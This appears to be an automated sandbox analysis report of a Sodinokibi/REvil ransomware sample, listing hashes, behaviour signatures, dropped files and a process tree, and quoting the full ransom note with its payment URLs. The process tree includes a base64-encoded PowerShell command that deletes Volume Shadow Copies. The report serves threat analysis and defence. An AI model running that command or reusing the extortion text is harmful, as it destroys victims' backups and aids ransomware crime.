Analysis

  • max time kernel
    124s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags

    arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2023 16:31

General

  • Target

    NEAS.5cba3e44271279e747a67dd312d4dca18832b5a850ea6b85a460846ef0101fb6.exe

  • Size

    166KB

  • MD5

    8cbc25e4d5c3dd1ee950c9eaaa67049d

  • SHA1

    2e3bc332df0adf7b9aaffad3e91d55463c858fd4

  • SHA256

    5cba3e44271279e747a67dd312d4dca18832b5a850ea6b85a460846ef0101fb6

  • SHA512

    ea5326a5535995aa6a6754e3cc24096a8d27a23eed9bcbcf8849e59e9d341eaf7022c0524a5d15ccdb0405dcabe43d18f8587d12c79b4bfb50211ed7d51dd97e

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QZcl+UNO:ZJ0BXScFy2RsQJ8zgZcl+U

Malware Config

Extracted

Path

C:\Users\4rgcztz2-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 4rgcztz2. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/412083B49592EBB4 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/412083B49592EBB4 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: C51MmtFI52/upoaCYwVhE5iIaRbI1HS7M/jBGO20XlH7q/Yb+8mEFA4BHJX6x76q 4dPtu/MaQL+zF3sMJnjJBi8utREzAhbVnIfK+5pZE2rrfk8An6+Xse3xHeMm2u0f d2CdsFuCkOreOtNdDCutyrJPMJKswjz4IP7ahO+HKwNjH+FBia8YLb9Jce+vlI4W qPZJTH7s0im0b+vFCFpWpjyw3/q07vHSqd5Di29Ms+GYrUYCVTA/awtmeCMHQXAf V4FRqnYxU5WWbd6IeFrfsAVE4ca5J/K16dgnF3N7J0vqXaA8vpTpBtkA/UaciTsh EhWivsOKcEYksu9sdkva5NnL8pOA/5nC8SY+YSTBYy2mOsUsCswP6MXg85dDpjkM quZj2bZuLDj2RlqNP7Rc/6mrd2rk7ymUeif3R5+0VRMy3GhvMMeadAbxkhGjrC54 gikxpO33NRqCOyVaP7i5qI12zSDeTjpZh0EQQzkqACd0lhmfPlXD4FjQev2toypU MJ+XLJxINVKNw9dMWJOvFeDVP3FKBmY7BlRM7Ik0JBY5M1X9f93drIzc4lFYD1hE IjzUNq0wDMRwas1ZLrFQQ2Pitle4w97OI2NqzGgnm86KCfhPe0nDnZHAfteMN2Pn AV+hnfnZkPtUGL9UPXoldaojg5w5gWPnahE4Uep4InD7OTGswvHfEBJidzrDLvXO Z44zbNQJ0UOjcYLu5RNnP3Mjr5Sd3rkFsDqjZ4sOp20qFV+9UNmUnrlpnNamEFIN Ia4xAJ2EF8lBPAYxTxb7R7BszFd0nwPr53RzrDyEOzUkwABgACW8pLP97adOE/sx 9Su9o1kNVTlzb5ofgh+Bj45bW0XsYVc4CzJZI6ctdo+WahPf+YayN0KrfB4M7Jqh r1nC1nPjLbncjVFSaNMpI1NZPQ/uzjSvR03BCbcNT36jCGghqfUCl6dmlTKbCwt8 GUCVrkmehiBz8W1l1r3kFYGA/xw6m2MpuMpFntDzLqBIQ7adQa2ZQJJHRRWkAU/y 7G8uzjnqFtKfN1VxSlEl/j4QEoBg+h9O0GlDAIpHBecDGOnH3TyA6Qo/rBkuYY8z /IEPSfDKJpOLDNIKEBWTi/ySbBFzAleJjIQrVFqDXfocO2/VJ+sc7UJ7hcSsNAMH ziGSFLSkRyZu04UH2GlGt3ERSlS2Ed17Qm0jrK3RcX5SPtmJOizoLZ5i8rGUQDSB C9Z4E/DAt+1vKuOpvxL/oS2W9eOigxoRdUd3Mddw4p5G8uKzTOlX84FMQA8Wt141 DABtmaN2aUErCVJvP8P4zZED8lU++deuAoBcw2HazNB0J9Fpdx4RZjtOal1zAEoJ wVHS7RRJKo8dUgVH5LBLLj8T+CunygxRAmrgU4J9r88fVMdr ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/412083B49592EBB4

http://decryptor.cc/412083B49592EBB4

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 40 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.5cba3e44271279e747a67dd312d4dca18832b5a850ea6b85a460846ef0101fb6.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.5cba3e44271279e747a67dd312d4dca18832b5a850ea6b85a460846ef0101fb6.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1352
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2664
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2012

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\4rgcztz2-readme.txt

      Filesize

      6KB

      MD5

      fba1c51d83e8260804bf61ae47d641f9

      SHA1

      b149cecafdcebdc0dcc7fc74b3afbd6571300ac9

      SHA256

      38265be888f434d4e4dfc1c21cf8161a830026fed3ad81daaeabbf15a88b188d

      SHA512

      61a5d79c3492bc4ca73b0402d5906ea1967e46d34eb90e1f026b3924f68a573e39ed5db86faf251481a5137b4b24089e1a5b4442cb0a9001bf939ccc5d7e14e3

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      beed11bf8ba5c6352a01fdcbf068126b

      SHA1

      b0f5bee50ade4c7169f7154db0c0446f06f748d0

      SHA256

      c8f66b9ee92e99cafb0b96aa3f29ffb84c146e6cf989045031ed825e17fcb3c9

      SHA512

      7a8a72551586465d3bb4c62f1ef0b7904b83d294d4f1d22243becae4b5c5a7d1c950e834e29054316ecdd026a8d5bb991116fc9b70391581351232910e38f9be

    • C:\Users\Admin\AppData\Local\Temp\CabBA1D.tmp

      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\TarBA9D.tmp

      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      194KB

      MD5

      e7f029bceafcdd1e456a349d361ea2bb

      SHA1

      285edf13e516e4569cf112b43ae118b62845219c

      SHA256

      566384aa4f106624a1e4af3f527eb5abd26579087d35ca403331b905f3f79cdf

      SHA512

      70380237adb33609757a9fcf02dcae53b666ae9a5e8f78830b154b04b4bdd8f97a69e2dacca5ca8c9ddd6cb315bc41a17992a330364a955cb5be1f4154893e3a

    • memory/1352-8-0x0000000002920000-0x00000000029A0000-memory.dmp

      Filesize

      512KB

    • memory/1352-10-0x0000000002920000-0x00000000029A0000-memory.dmp

      Filesize

      512KB

    • memory/1352-11-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

      Filesize

      9.6MB

    • memory/1352-9-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

      Filesize

      9.6MB

    • memory/1352-6-0x00000000025A0000-0x00000000025A8000-memory.dmp

      Filesize

      32KB

    • memory/1352-4-0x000000001B300000-0x000000001B5E2000-memory.dmp

      Filesize

      2.9MB

    • memory/1352-7-0x0000000002920000-0x00000000029A0000-memory.dmp

      Filesize

      512KB

    • memory/1352-5-0x000007FEF60A0000-0x000007FEF6A3D000-memory.dmp

      Filesize

      9.6MB